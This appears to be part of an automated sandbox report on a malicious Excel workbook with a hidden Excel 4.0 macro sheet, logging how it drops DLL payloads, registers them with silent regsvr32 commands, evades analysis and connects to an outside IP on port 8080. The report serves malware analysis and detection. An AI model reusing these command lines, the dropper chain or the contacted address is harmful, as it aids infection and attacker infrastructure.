Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017C8C 7_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000A48C 7_2_000000018000A48C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180029710 7_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026F14 7_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023748 7_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001D58 7_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002B368 7_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001378 7_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010590 7_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800091A8 7_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800165E4 7_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018FE8 7_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001ABE8 7_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180029DF0 7_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800243F4 7_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180015DF4 7_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800011F4 7_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800247FC 7_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001DBFC 7_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000FE08 7_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001100C 7_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180027E14 7_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000B618 7_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023220 7_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180027C28 7_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180020A34 7_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180007634 7_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180022E38 7_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E638 7_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002143C 7_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001303C 7_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002A840 7_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003840 7_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000B444 7_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F048 7_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002AC4C 7_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010050 7_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010250 7_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003050 7_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180011E5C 7_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000445C 7_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000C85C 7_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003460 7_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026A64 7_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180004264 7_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180029C6C 7_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001586C 7_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000406C 7_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E06C 7_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BC70 7_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F678 7_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E278 7_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001447C 7_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180005E7C 7_2_0000000180005E7C
Found potential string decryption / allocating functions
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74DBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF753BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70C7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74D7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF7537FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00000001800153F4 appears 48 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D27FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74DB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF753B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CB3B0 appears 148 times
Found a hidden Excel 4.0 Macro sheet
Source: DETAILS 25922194612.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
Source: DETAILS 25922194612.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
Source: DETAILS 25922194612.xls ReversingLabs: Detection: 41%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6882.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@18/18@5/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: DETAILS 25922194612.xls OLE indicator, Workbook stream: true
Source: DETAILS 25922194612.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 4_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: DETAILS 25922194612.xls Initial sample: OLE indicators vbamacros = False
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006951 pushad ; retf 8_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180006951 pushad ; retf 10_2_0000000180006953
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
PE file contains an invalid checksum
Source: T35PENELLOsp[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
Source: Jf8[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
Source: uxevr1.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
Source: uxevr3.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
Source: uxevr2.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
Source: 4HWP0KQI[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
Source: uxevr4.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
Registers a DLL
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy) Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\FiPeSYwmr\Wuiko.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\regsvr32.exe TID: 1468 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2588 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1292 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2960 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 464 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 900 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1268 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2224 Thread sleep time: -240000s >= -30000s Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 9_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 11_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 0000000A.00000002.950666041.0000000000228000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RomNECVMWar_VMware_SATA_CD01_______________1.00___
Source: regsvr32.exe, 00000008.00000002.943436564.000000000038A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error, 3_2_000007FEF9D30215
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_000007FEF9D2BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000007FEF7533280
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000007FEF753BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_000007FEF74D3280
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_000007FEF74DBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_000007FEF70CBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_000007FEF70C3280

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll" Jump to behavior
